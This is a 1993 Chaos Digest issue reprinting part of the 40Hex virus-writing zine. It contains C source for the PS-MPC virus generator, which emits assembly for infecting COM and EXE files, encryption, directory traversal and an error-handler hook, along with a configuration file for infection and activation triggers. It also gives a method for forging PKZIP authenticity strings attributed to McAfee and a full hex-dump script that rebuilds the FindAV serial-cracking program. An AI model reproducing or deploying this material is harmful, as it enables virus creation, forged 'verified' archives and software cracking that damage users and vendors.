Copy Link
Add to Bookmark
Report
Chaos Digest Volume 01 Numero 66
Chaos Digest Jeudi 1er Juillet 1993 Volume 1 : Numero 66
ISSN 1244-4901
Editeur: Jean-Bernard Condat (jbcondat@attmail.com)
Archiviste: Yves-Marie Crabbe
Co-Redacteurs: Arnaud Bigare, Stephane Briere
TABLE DES MATIERES, #1.66 (1er Juillet 1993)
File 1--40H VMag Number 8 Volume 2 Issue 4 #001(3)-003 (reprint)
Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost by sending a message to:
linux-activists-request@niksula.hut.fi
with a mail header or first line containing the following informations:
X-Mn-Admin: join CHAOS_DIGEST
The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299)
groups.
Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352)
466893. Back issues of ChaosD can be found on the Internet as part of the
Computer underground Digest archives. They're accessible using anonymous FTP:
* kragar.eff.org [192.88.144.4] in /pub/cud/chaos
* uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
* halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
* ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
* cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos
* ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
* nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
* orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos
CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views. ChaosD
material may be reprinted for non-profit as long as the source is cited.
Some authors do copyright their material, and they should be contacted for
reprint permission. Readers are encouraged to submit reasoned articles in
French, English or German languages relating to computer culture and
telecommunications. Articles are preferred to short responses. Please
avoid quoting previous posts unless absolutely necessary.
DISCLAIMER: The views represented herein do not necessarily represent
the views of the moderators. Chaos Digest contributors
assume all responsibility for ensuring that articles
submitted do not violate copyright protections.
----------------------------------------------------------------------
Date: Tue May 11 09:24:40 PDT 1993
From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
Subject: File 1--40H VMag Number 8 Volume 2 Issue 4 #001(3)-003 (reprint)
/* FILE: VSUBS.C */
#include "vheader.h"
void code_subroutines(void)
{
printlabel("open:","");
print("mov ah,3dh","");
print("lea dx,[bp+newDTA+30]","filename in DTA");
print("int 21h","");
print("xchg ax,bx","");
print("ret","");
printblank();
printlabel("attributes:","");
print("mov ax,4301h","Set attributes to cx");
print("lea dx,[bp+newDTA+30]","filename in DTA");
print("int 21h","");
print("ret","");
printblank();
if (config.p.encrypt)
{
printlabel("write:","");
print("pop bx","Restore file handle");
print("pop bp","Restore relativeness");
print("mov ah,40h","Write to file");
print("lea dx,[bp+decrypt]","Concatenate virus");
print("mov cx,heap-decrypt","# bytes to write");
print("int 21h","");
print("push bx","");
print("push bp","");
printlabel("endwrite:","");
printblank();
}
if (config.p.int24)
{
printlabel("int24:","New int 24h (error) handler");
print("mov al,3","Fail call");
print("iret","Return control");
printblank();
}
}
----------------------------------- Cut Here --------------------------------
/* FILE: VTAIL.C */
#include "vheader.h"
void code_tail(void)
{
if (config.p.infectCOM)
printlabel("end entry_point","");
else
if (config.p.encrypt)
printlabel("end decrypt","");
else
printlabel("end startvirus","");
}
----------------------------------- Cut Here -------------------------------
/* FILE: VTRAVEL.C */
#include "vheader.h"
void code_traversal_generic(void);
void dot_dot(void);
void lea_exe(void);
void lea_com(void);
void code_traversal(void)
{
config.p.calls_check = 0;
switch (config.p.traverse)
{
case NONE: code_traversal_generic(); break;
case DOT_DOT: printlabel("dir_scan:","\"dot dot\" traversal");
code_traversal_generic();
dot_dot();
break;
}
printblank();
printlabel("done_infections:","");
}
void code_traversal_generic(void)
{
if (config.p.infectEXE) {
lea_exe();
if (!config.p.infectCOM)
code_check();
}
if (config.p.infectCOM) {
lea_com();
if (config.p.infectEXE)
config.p.calls_check++;
else
code_check();
}
}
void lea_exe(void)
{
print("lea dx,[bp+exe_mask]","");
if (config.p.infectCOM)
print("call infect_mask","");
}
void lea_com(void)
{
print("lea dx,[bp+com_mask]","");
if (config.p.infectEXE)
print("call infect_mask","");
}
void dot_dot(void)
{
print("mov ah,3bh","change directory");
print("lea dx,[bp+dot_dot]","\"cd ..\"");
print("int 21h","");
print("jnc dir_scan","go back for mo!");
}
----------------------------------- Cut Here --------------------------------
/* FILE: VVAR.C */
#include "vheader.h"
void code_variables(void)
{
if (config.p.infectEXE) addvar("exe_mask","db '*.exe',0","");
if (config.p.infectCOM) addvar("com_mask","db '*.com',0","");
if (config.p.traverse == DOT_DOT)
addvar("dot_dot","db '..',0","");
}
----------------------------------- Cut Here --------------------------------
;FILE: SKELETON.CFG
;Skeleton configuration file for PS-MPC version 0.90a
;Lines beginning with semicolons denote comments
;Required parameters:
;Filename = <string>
;This is the filename to be generated by PS-MPC as the source code file.
Filename = target.asm
;Infect = (C,E)
;COM, EXE
;Note: You can mix the two, a la "Infect = C,E" Do not use a space to
; deliminate the two parameters.
Infect = C,E
;Optional parameters - Defaults are shown in square brackets
;Traversal = <N,D>
;([None], Dot Dot)
;If None is specified, then only the files in the current directory will be
;infected. If Dot dot is specified, then files in the current directory and
;subdirectories below the current will be infected.
Traversal = N
;Encrypted = <Y,N>
;(Yes, [No])
;Only turn off encryption if you wish to limit the size of the virus.
Encryption = Y
;IDWord = XX
;([ ],XX)
;The IDWord consists of two characters which are used to identify already
;infected EXE files. This line is not needed in COM-only infectors. Do
;not use an apostrophe or the source code will not assemble properly.
IDWord = DA
;MinSize = #
;(A,[0]..65535)
;MinSize is used only in the infection of COM files. Files under MinSize
;bytes are not infected. MinSize = 0 turns off this option. MinSize = A
;indicates use of the virus's effective length as the minimum size. This
;line is ignored in EXE-specific infectors.
MinSize = 0
;MaxSize = #
;(A,[0]..65535)
;MaxSize is used only in the infection of COM files. Files above MaxSize
;bytes are not infected. MaxSize = 0 turns off this option. MaxSize = A
;indicates automatic calculation of maximum size. This line is not needed
;in EXE-only infectors.
MaxSize = A
;Infections = #
;([0]..255)
;Infections is an optional counter limiting the number of infections per run
;of the virus to a specific number. Infections = 0 disables this option.
Infections = 0
;ErrorHandler = <Y,N>
;(Yes, [No])
;ErrorHandler selects if you wish to include a short critical error handler
;in the virus. This handler prevents Abort, Retry, Fail messages by taking
;over the critical error interrupt. Attempted infection of files on write-
;protected diskettes will not generate an error if this option is set.
ErrorHandler = Y
;CommandCom = <Y,N>
;(Yes, [No])
;This flag indicates whether you wish the virus to infect COMMAND.COM
;'Yes' turns off the check for COMMAND.COM, thus saving space.
CommandCom = N
;VirusName = <string>
;The only limitation to the string is that you may not use both the single
;and double quotes together in the string, i.e. the string B'li"p is not
;legal.
VirusName = [Skeleton]
;AuthorName = <string>
;The same constraints apply to AuthorName.
AuthorName = Deke
;AllowZero = <Y,N>
;(Yes, [No])
;This flags whether the virus will allow an encryption value of 0, which
;would effectively leave it in an unencrypted state. 'Yes' disables the
;zero check, thereby shortening code length.
AllowZero = N
;Activation Conditions
;All conditions must be satisfied for activation to occur
;Always = <Y,N>
;(Yes, [No])
;This flags whether the virus always activates, although I can't imagine a
;useful virus that does so.
;Always = N
;IfMonth = #
;<1..12><-,+>
;Activate if the month is equal to the specified number. Adding a minus sign
;after the month indicates activation before or during the specified month.
;Adding a plus sign after the month indicates activation during or after the
;specified month.
;IfMonth = 11+ ;Activate in either November or December
;IfDay = #
;<1..31><-,+>
;Activate if the date is on a certain date Adding a minus sign after the day
;indicates activation on or before that day. Similarly, adding a plus sign
;indicates activation on or after that day. Note: the program does not check
;to see if the number inputted is a valid date. For example, combining
;IfMonth=2 and IfDay=30+ will NOT result in an error, although the virus will
;clearly never activate.
;IfDay = 15+ ;Activate after the fifteenth of the month
;IfYear = #
;<0..65535><-,+>
;Activate during a certain year or years. Don't be stupid and put a
;ridiculous year such as 1-.
;IfYear = 1993+ ;Activate after 1993
;IfDOW = #
;<0..6><-,+>
;0 = Sunday, 1 = Monday, etc.
;Activate on, before, or after a particular day of the week.
;IfDOW = 0 ;Activate only on Sundays
;IfMonthDay = #,#
;<#,#><-,+>
;Activate on, before, or after a particular day of the year. This differs
;from the combination of IfMonth and IfDay.
;IfMonthDay = 5,9+ ;Activate only after May 9th
;compare to:
;IfMonth = 5+ ;Activate in May through December, but only if the
;IfDay = 9+ ;day is on or after the 8th. July 1st is NOT an
;activation date
;IfHour = #
;<0..23><-,+>
;This should be self-explanatory at this point.
;IfHour = 12 ; Activate any time from 12 noon -> 1 P.M.
;IfMinute = #
;<0..59><-,+>
;Duh.
;IfMinute = 30+
;IfSecond = #
;<0..59><-,+> ;; check 0
;This is somewhat useless, in my estimation
;IfSecond = 30+
;Percentage = #
;<1..99>
;This uses the 1/100 second counter as a random number. If the counter is
;less than the percentage, then the virus will activate.
;Percentage = 50 ; Even odds
-------------------------------- Stop Cutting -------------------------------
+++++
40Hex Number 8 Volume 2 Issue 4 File 002
-=-=-=-=-=-=-
Eat PUTAV
by Demogorgon of PHALCON/SKISM
-=-=-=-=-=-=-
Even though pk-zip 2.0 will be out soon and all the methods in
this article will be obsolete, I decided to write about them anyway. I
am sure you are familiar with the old program called makeav, which
attempted to brute force hack pkzip registration serial numbers. Sure,
it worked, but it was quite slow. Then, Hal released the program
findav, which did the same task several thousand times faster. Dark
Angel took apart the program findav in order to make a few
modifications. Naturally, Hal included several routines in his code in
order to make it very difficult to take apart. Dark Angel captured a
memory image of findav after it loaded into memory, wrote it back to
disk as a com file, and then changed all of the offsets so that all
references to the data segment were changed to their address in the code
segment. Dark Angel made several modifications, the most important of
which was so that findav would not quit out after finding a serial
number. The new version finds every serial number, and logs them to
disk.
-=-=-=-=-=-=-
An Experiment in Distributed Processing
-=-=-=-=-=-=-
The next day, Garbageheap and I took the modified findav down to
the nearest university. We started it running on twenty 80386 systems
on their network, each working on a different segment of the 4 billion
possible serial numbers. The goal was to find every serial number that
worked for McAfee Associates, so that we could then determine which one
was the one he uses. When an authenticity verified pkzip file is
extracted, pkunzip generates a 3 letter, 3 number validation string that
is dependent on the serial number used to validate it. A single
registration name has millions of valid serial numbers, but each of
these serial numbers has one unique validation string.
For Example:
PKUNZIP (R) FAST! Extract Utility Version 1.1 03-15-90
Copr. 1989-1990 PKWARE Inc. All Rights Reserved. PKUNZIP/h for help
PKUNZIP Reg. U.S. Pat. and Tm. Off.
Searching ZIP: EARLOBE.ZIP
Exploding: NUL -AV
Authentic files Verified! # ATU314 Zip Source: McAFEE ASSOCIATES
^^^^^^
PKUNZIP (R) FAST! Extract Utility Version 1.1 03-15-90
Copr. 1989-1990 PKWARE Inc. All Rights Reserved. PKUNZIP/h for help
PKUNZIP Reg. U.S. Pat. and Tm. Off.
Searching ZIP: EARLOBE.ZIP
Exploding: NUL -AV
Authentic files Verified! # SXQ414 Zip Source: McAFEE ASSOCIATES
^^^^^^
Therefore, the task was to find which of the serial numbers we had
found for McAfee produces the validation string "NWN405". To do this,
we ran every serial number through a program called checkav which Dark
Angel wrote to determine what validation number corresponds to which
serial number. Of course, a task like this would be nearly impossible
on your machine at home, but thanks to my local university, we were able
to use twenty machines at once.
-=-=-=-=-=-=-
Yet Another Way To Eat PUTAV
-=-=-=-=-=-=-
Because there is never only one way to do something, I decided to
put in another way to get whatever validation string you want out of
pkzip. All you need to do is include some ^H characters in your
registration name to backspace over the validation string and create a
new one. Naturally, you can not enter ^H characters when you run
putav, so you enter the correct number of some other character, go
into memory with td, and change them to 08h, the ^H character. That
way, when pkunzip runs and gives you a validation string, it will
backspace over it and show your own. For example:
>>>>> PUTAV.EXE
PUTAV - Put Authenticity Verification in PKZIP.EXE
Copyright 1990 PKWARE, Inc. All rights reserved.
Enter company name exactly as it appears on the PKWARE documentation.
Company Name : ^A^A^A^A^A^A^A^A^A^A^A# BOB666 Earlobe industries
Enter serial number exactly as it appears on the PKWARE documentation.
Serial Number: 23453244
>>>>>
After typing earlobe industries and hitting return, break into
turbo debug and change the ^A's (01) to ^H's (08). Remember to put in
11 backspaces. You can use the same method to find the serial number for
your string with findav.
The only useful application of all this is to duplicate an existing
pkzip registration. You could do that before, but now you can do it
better. Changing the validation string only really makes a difference
if you are trying to duplicate an archive that is known to have a certain
one, like McAfee's.
+++++
40Hex Number 8 Volume 2 Issue 4 File 003
-=PHALCON/SKISM=- Presents FindAv P/S Style!
PD War Collection Program 2
By Hal Of Pheonix
Modified by: Dark Angel of PHALCON/SKISM
FindAV version 1.5
Released 27 Jul 92
By Dark Angel of PHALCON/SKISM
In the beginning, there was MakeAV and all its counterparts. These programs
used a brute-force approach to find PKZIP serial numbers. They ran PUTAV,
PKZIP, and PKUNZIP repeatedly until a legitimate serial number was found.
Although they worked, these programs required hours, often days of running, as
well as much wear and tear on the hard drive head. Then FindAV was released
by HAL of PHOENIX.
FindAV was many, many times faster than MakeAV. Instead of running the PKWare
files over and over again, FindAV used an algorithmic approach similar to the
one used by PKWare when calculating serial numbers for registered clients. It
was a marvelous program, but it, too, had its limitations. The continual
display of numbers was aesthetically pleasing, but it took much valuable
processor time, slowing down the search for the holy serial number. E-FindAV
was released, once again speeding the search time by a large factor. E-FindAV
monitored the running of FindAV, turning off the display until the serial
number was found. This was a tremendous improvement. However, the user had
to sit through a tedious, lengthy, entirely unecessary introduction screen
before E-FindAV would execute FindAV. This was unacceptable. Additionally,
E-FindAV failed to fix some fundamental problems with FindAV.
For one, FindAV stopped after finding the first serial number. While this is
fine for most people, it is not desirable when finding existing serial
number/validation string combinations. Second, FindAV had a few bugs. The
first bug occured only in 386 mode. FindAV would "miss" some legitimate
serial numbers which it would catch in 8086 mode. This was, once again,
undesirable when looking for existing serial number/validation string
combinations. FindAV would also run into an infinite loop in certain
instances in 8086 mode. This, too, was unacceptable. Third, FindAV would not
log the serial numbers found in a file. Thus, the user had to manually copy
the number onto a sheet of paper and transfer it to a file for later
reference. Fourth, FindAV would not let the user start searching for a serial
number from any number except 1000. If the user wished to find starting from,
say, 2 billion, he or she would be forced to create a MAKEAV.DAT file and
hex-edit the appropriate values. Last, both FindAV and E-FindAV used
rudimentary disassembly-proof code which precluded users from adding features
to the program.
FindAV version 1.5 fixes these problems. It is essentially the same program
as the originally released version by HAL of PHOENIX, but with all the fixes
and enhancements mentioned above.
Command line options:
/B - begin at number
You can now start the search from any number, be it 0, 4,294,967,295 or
anything in between. This serves several purposes. Should the data file be
corrupted, it is not necessary to hexedit the data file to restart from the
last position. This option also facilitates the coordinated running of FindAV
on multiple machines. In this manner, each machine can start the search at a
different point. The value following the /B overrides the value in the
FindAV.DAT data file.
Syntax:
FindAV /B ###
Example:
FindAV /B 478293
/S - supress output
Searches may be expedited somewhat with this supress output option. This
eliminates the unecessary on-screen reporting of a sucessful finding. Logging
via the AVS.DAT file is preserved. The 'D'isplay command continues to
function
under this mode.
Syntax:
FindAV /S
Valid keystrokes in FindAV:
ESC - Terminate calculation
Pressing the ESC key causes FindAV to terminate after saving the status of the
run in FindAV.DAT.
'D' - Display
Pressing the 'D' key causes FindAV to display the current search number on the
screen. This function was originally part of the main loop. However, it
consumed countless clock cycles, so it was eliminated to save precious time.
Files created by FindAV 1.5:
AVS.DAT - log file
The AVS.DAT file is created by FindAV. FindAV uses this file to record all
sucessful serial number finds. It consists of the company name followed by
multiple lines of serial numbers. If FindAV detects the file in the directory,
it will append serial numbers to the end.
FINDAV.DAT - save file
The FindAV.DAT file is created by FindAV when the user terminates calculation.
It contains the company name as well as the current search number. It is
useful when the user does not wish to search an entire range in one running.
FindAV will automatically resume operation if it detects FindAV in the current
directory. FindAV 1.5 has data file compatability with version 1.0.
Revision history:
1.0 - Unknown - HAL of PHOENIX
- initial release
1.5 - 27 Jul 92 - Dark Angel of PHALCON/SKISM
- Bug fixes, peephole optimisation, log file, nonstop action, anynumber
begin.
-----------------------------------------------------------------------------
n findav15.com
e 0100 E8 B8 02 74 03 E8 09 00 E8 01 04 B4 4C CD 21 6C
e 0110 01 E8 44 01 75 0F E8 D5 00 BA D9 06 E8 27 04 E8
e 0120 5F 00 E8 84 00 E8 13 00 72 10 BF 06 06 2E FF 16
e 0130 0F 01 73 DD BA F2 06 E8 0C 04 C3 B4 01 CD 16 74
e 0140 1E 2A E4 CD 16 3C 64 74 13 3C 44 74 0F 3C 1B 75
e 0150 0E BA 61 07 E8 EF 03 E8 F1 03 F9 C3 E8 1F 00 F8
e 0160 C3 66 83 3D FF 74 15 66 FF 05 F8 C3 8B 05 8B 55
e 0170 02 40 75 03 42 74 05 AB 92 AB F8 C3 F9 C3 E8 6D
e 0180 00 E8 5F 00 BA AD 07 E8 BC 03 C3 B8 01 3D BA 7B
e 0190 08 CD 21 93 C3 BA D5 07 E8 AB 03 E9 6A FF B4 40
e 01A0 BA D0 07 B9 02 00 CD 21 C3 E8 DF FF 73 1B B4 3C
e 01B0 33 C9 CD 21 72 DF E8 D2 FF B4 40 8A 0E 13 06 B5
e 01C0 00 BA 14 06 CD 21 E8 D5 FF B8 02 42 33 C9 99 CD
e 01D0 21 B4 40 B9 0B 00 BA B5 07 CD 21 E8 C0 FF B4 3E
e 01E0 CD 21 C3 B4 02 32 FF 8B 16 49 06 CD 10 C3 FD BF
e 01F0 BF 07 B9 0A 00 80 3E 05 06 00 74 24 66 A1 06 06
e 0200 66 BB 0A 00 00 00 66 33 D2 66 0B C0 75 06 B0 20
e 0210 F3 AA FC C3 66 F7 F3 92 04 30 AA 92 E2 E8 FC C3
e 0220 88 0E C2 07 A1 06 06 8B 16 08 06 EB 06 8B 46 02
e 0230 8B 56 04 0B C0 75 08 0B D2 75 04 B0 20 EB 10 6A
e 0240 0A 52 50 E8 3C 01 89 4E 04 89 46 02 92 04 30 AA
e 0250 FE 0E C2 07 75 D7 FC C3 E8 3E 01 E8 D8 00 75 07
e 0260 E8 05 00 75 02 32 C0 C3 BF 0A 06 C7 06 C1 07 00
e 0270 0A 80 3E 05 06 00 74 24 66 8B 05 66 C1 C8 10 66
e 0280 B9 0A 00 00 00 66 0B C0 74 50 66 33 D2 66 F7 F1
e 0290 00 16 C1 07 FE 0E C2 07 75 EB EB 3E C7 45 04 9A
e 02A0 3B C7 45 06 00 CA FF 75 04 FF 75 06 FF 35 FF 75
e 02B0 02 E8 2C 00 6A 0A 52 50 E8 C7 00 00 16 C1 07 B8
e 02C0 0A 00 99 52 50 FF 75 04 FF 75 06 E8 12 00 89 55
e 02D0 04 89 45 06 FE 0E C2 07 75 CC 80 3E C1 07 3E C3
e 02E0 55 8B EC 8B 4E 0A E3 38 8B 5E 08 8B 56 06 8B 46
e 02F0 04 D1 E9 D1 DB D1 EA D1 D8 0B C9 75 F4 F7 F3 8B
e 0300 F0 F7 66 0A 91 8B 46 08 F7 E6 03 D1 72 0C 3B 56
e 0310 06 77 07 72 06 3B 46 04 76 01 4E 33 D2 96 EB 12
e 0320 8B 4E 08 8B 46 06 33 D2 F7 F1 8B 5E 04 93 F7 F1
e 0330 8B D3 5D C2 08 00 B9 07 00 BB 9D 00 BF 0A 06 EB
e 0340 1E 80 3E 05 06 00 74 17 66 D3 0D 66 8B 05 66 33
e 0350 D2 F7 F3 66 C1 C8 10 66 83 E8 1A F7 F3 EB 20 8B
e 0360 15 8B 45 02 8B F0 D1 EE D1 DA D1 D8 E2 F8 89 15
e 0370 89 45 02 2D 1A 00 83 DA 00 53 52 50 E8 03 00 0B
e 0380 D2 C3 55 8B EC 8B 5E 08 8B 46 06 33 D2 F7 F3 8B
e 0390 4E 04 91 F7 F3 5D C2 06 00 BE 06 06 AD 89 44 02
e 03A0 AD 89 44 02 BE 14 06 32 ED 8A 0E 13 06 33 DB AC
e 03B0 30 87 0A 06 43 80 E3 03 E2 F5 C3 BA 4B 06 E8 85
e 03C0 01 E8 48 01 E8 0A 02 E8 22 00 E8 D4 00 80 3E 13
e 03D0 06 00 75 03 E8 5B 01 33 F6 E8 37 01 80 3E 13 06
e 03E0 00 75 08 BA 41 07 E8 5D 01 32 C0 C3 BE 81 00 AC
e 03F0 3C 0D 74 37 3C 2F 75 F7 AC E8 86 00 3C 53 75 13
e 0400 B8 90 00 BF 19 01 B9 09 00 F3 AA BA 83 08 E8 35
e 0410 01 EB DC 3C 42 74 15 3C 3F 75 05 BA 0E 09 EB 5D
e 0420 A2 0A 09 BA F6 08 E8 1D 01 EB C4 C3 32 E4 33 DB
e 0430 B9 0A 00 99 AC E8 62 00 74 FA E8 50 00 74 05 BA
e 0440 A3 08 EB 39 50 92 F7 E1 50 93 F7 E1 5B 03 D3 5B
e 0450 03 C3 83 D2 00 93 AC E8 33 00 74 E8 4E 89 1E 06
e 0460 06 89 16 08 06 E8 86 FD BA E2 08 E8 D8 00 BA B3
e 0470 07 E8 D2 00 BA D2 07 E8 CC 00 E9 72 FF E8 C6 00
e 0480 CD 20 3C 61 7C 06 3C 7A 7F 02 04 E0 C3 3C 30 7C
e 0490 08 3C 39 7F 04 2C 30 3A C0 C3 3C 20 74 02 3C 3D
e 04A0 C3 E8 D3 00 72 65 BA 51 08 E8 9A 00 B9 05 00 E8
e 04B0 DA 00 72 54 8B F2 AD 3D 41 56 75 46 AD 3D 31 30
e 04C0 75 40 BA 14 06 8A 0C E8 C2 00 72 3C 83 3E 08 06
e 04D0 00 75 12 81 3E 06 06 E8 03 75 0A BA 06 06 B1 04
e 04E0 E8 A9 00 72 1D AC A2 13 06 98 91 BE 14 06 BF 31
e 04F0 08 F3 A4 B8 0D 0A AB B0 24 AA BA 21 08 E8 46 00
e 0500 EB 06 BA 31 08 E8 3E 00 E8 78 00 C3 BE 01 00 E8
e 0510 01 00 C3 E8 11 00 B4 01 0B F6 75 05 80 CD 20 EB
e 0520 03 80 E5 DF CD 10 C3 B4 03 32 FF CD 10 89 16 49
e 0530 06 C3 BA 98 07 E8 0E 00 B4 0A BA 12 06 CD 21 BA
e 0540 D0 07 E8 01 00 C3 B4 09 CD 21 C3 E8 6C 00 72 26
e 0550 BF 4B 06 B8 41 56 AB B8 31 30 AB BE 13 06 AC AA
e 0560 98 8B C8 F3 A4 BE 06 06 A5 A5 04 09 91 BA 4B 06
e 0570 E8 31 00 E8 0D 00 C3 B8 00 3D BA C3 07 CD 21 A3
e 0580 CE 07 C3 B4 3E 8B 1E CE 07 CD 21 C3 B4 3F 8B 1E
e 0590 CE 07 CD 21 72 06 3B C1 75 02 F8 C3 BA 06 08 E8
e 05A0 A4 FF F9 C3 B4 40 8B 1E CE 07 CD 21 73 0B 3B C1
e 05B0 74 07 BA EE 07 E8 8E FF F9 C3 B4 3C 33 C9 BA C3
e 05C0 07 CD 21 73 08 BA D5 07 E8 7B FF F9 C3 A3 CE 07
e 05D0 C3 9C 58 25 FF 0F 50 9D 9C 58 25 00 F0 3D 00 F0
e 05E0 74 22 9C 58 0D 00 70 50 9D 9C 58 25 00 70 3D 00
e 05F0 70 75 11 FE 06 05 06 2E C7 06 0F 01 61 01 BA 2E
e 0600 07 E8 42 FF C3 00 E8 03 00 00 00 00 00 00 00 00
e 0610 00 00 34 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0620 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0630 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0640 00 00 00 00 00 00 00 00 00 00 00 50 72 6F 67 72
e 0650 61 6D 20 74 6F 20 66 69 6E 64 20 73 65 72 69 61
e 0660 6C 20 23 20 66 6F 72 20 41 56 20 20 76 65 72 20
e 0670 31 2E 35 0D 0A 76 65 72 20 31 2E 30 20 3C 20 62
e 0680 79 20 48 41 4C 20 66 6F 72 20 50 48 4F 45 4E 49
e 0690 58 20 3E 0D 0A 76 65 72 20 31 2E 35 20 62 79 20
e 06A0 44 61 72 6B 20 41 6E 67 65 6C 20 6F 66 20 50 48
e 06B0 41 4C 43 4F 4E 2F 53 4B 49 53 4D 0D 0A 50 72 65
e 06C0 73 73 20 45 53 43 20 74 6F 20 65 78 69 74 20 70
e 06D0 72 6F 67 72 61 6D 0D 0A 24 0D 0A 53 65 72 69 61
e 06E0 6C 20 6E 75 6D 62 65 72 20 66 6F 75 6E 64 21 0D
e 06F0 0A 24 0D 0A 46 69 6E 64 41 56 20 63 6F 6D 70 6C
e 0700 65 74 65 64 2E 20 20 4E 6F 20 6D 6F 72 65 20 73
e 0710 65 72 69 61 6C 20 6E 75 6D 62 65 72 73 20 6D 61
e 0720 79 20 62 65 20 66 6F 75 6E 64 2E 0D 0A 24 33 38
e 0730 36 20 43 50 55 20 64 65 74 65 63 74 65 64 0D 0A
e 0740 24 4E 6F 20 69 6E 70 75 74 2C 20 61 62 6F 72 74
e 0750 69 6E 67 20 6F 70 65 72 61 74 69 6F 6E 21 0D 0A
e 0760 24 0D 0A 45 53 43 20 6B 65 79 20 64 65 74 65 63
e 0770 74 65 64 2C 20 73 61 76 69 6E 67 20 46 49 4E 44
e 0780 41 56 2E 44 41 54 20 61 6E 64 20 65 78 69 74 69
e 0790 6E 67 2E 2E 2E 0D 0A 24 45 6E 74 65 72 20 63 6F
e 07A0 6D 70 61 6E 79 20 6E 61 6D 65 3A 20 24 54 72 79
e 07B0 69 6E 67 20 23 20 20 20 20 20 20 20 20 20 20 20
e 07C0 24 00 00 46 49 4E 44 41 56 2E 44 41 54 00 00 00
e 07D0 0D 0A 0D 0A 24 0D 0A 45 72 72 6F 72 20 63 72 65
e 07E0 61 74 69 6E 67 20 66 69 6C 65 21 0D 0A 24 0D 0A
e 07F0 45 72 72 6F 72 20 77 72 69 74 69 6E 67 20 66 69
e 0800 6C 65 21 0D 0A 24 0D 0A 45 72 72 6F 72 20 69 6E
e 0810 20 72 65 61 64 69 6E 67 20 66 69 6C 65 21 0D 0A
e 0820 24 43 6F 6E 74 69 6E 75 69 6E 67 20 66 6F 72 3A
e 0830 20 42 61 64 20 66 69 6C 65 20 68 65 61 64 65 72
e 0840 20 69 6E 20 46 49 4E 44 41 56 2E 44 41 54 0D 0A
e 0850 24 46 49 4E 44 41 56 2E 44 41 54 20 64 65 74 65
e 0860 63 74 65 64 2C 20 72 65 61 64 69 6E 67 20 69 6E
e 0870 20 64 61 74 61 2E 2E 2E 0D 0A 24 41 56 53 2E 44
e 0880 41 54 00 53 75 70 70 72 65 73 73 69 6F 6E 20 6F
e 0890 66 20 6F 75 74 70 75 74 20 61 63 74 69 76 65 2E
e 08A0 0D 0A 24 46 61 74 61 6C 20 65 72 72 6F 72 20 69
e 08B0 6E 20 70 61 72 61 6D 65 74 65 72 20 42 45 47 49
e 08C0 4E 2E 0D 0A 50 72 6F 70 65 72 20 75 73 61 67 65
e 08D0 3A 20 2F 42 20 23 23 23 23 23 23 23 23 23 23 0D
e 08E0 0A 24 42 65 67 69 6E 6E 69 6E 67 20 73 65 61 72
e 08F0 63 68 20 61 74 24 55 6E 6B 6E 6F 77 6E 20 70 61
e 0900 72 61 6D 65 74 65 72 3A 20 2F 00 0D 0A 24 50 61
e 0910 72 61 6D 65 74 65 72 73 20 61 72 65 3A 0D 0A 2F
e 0920 3F 20 20 20 20 20 20 20 20 20 20 44 69 73 70 6C
e 0930 61 79 20 74 68 69 73 20 73 63 72 65 65 6E 0D 0A
e 0940 2F 42 20 23 23 23 23 23 20 20 20 20 42 65 67 69
e 0950 6E 20 61 74 20 23 23 23 23 23 0D 0A 2F 53 20 20
e 0960 20 20 20 20 20 20 20 20 73 75 70 70 72 65 73 73
e 0970 20 6F 75 74 70 75 74 0D 0A 24 1A 1A 1A 1A 1A 1A
rcx
097F
w
q
------------------------------
End of Chaos Digest #1.66
************************************
